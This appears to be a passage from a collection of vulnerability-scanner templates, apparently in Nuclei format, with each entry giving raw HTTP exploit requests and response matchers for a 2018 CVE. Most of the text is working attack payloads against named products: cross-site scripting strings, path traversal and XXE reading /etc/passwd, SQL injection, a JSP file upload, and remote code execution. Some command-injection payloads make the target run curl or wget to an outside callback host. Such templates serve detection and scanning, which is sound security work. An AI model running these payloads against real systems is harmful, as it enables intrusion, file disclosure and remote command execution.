HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET 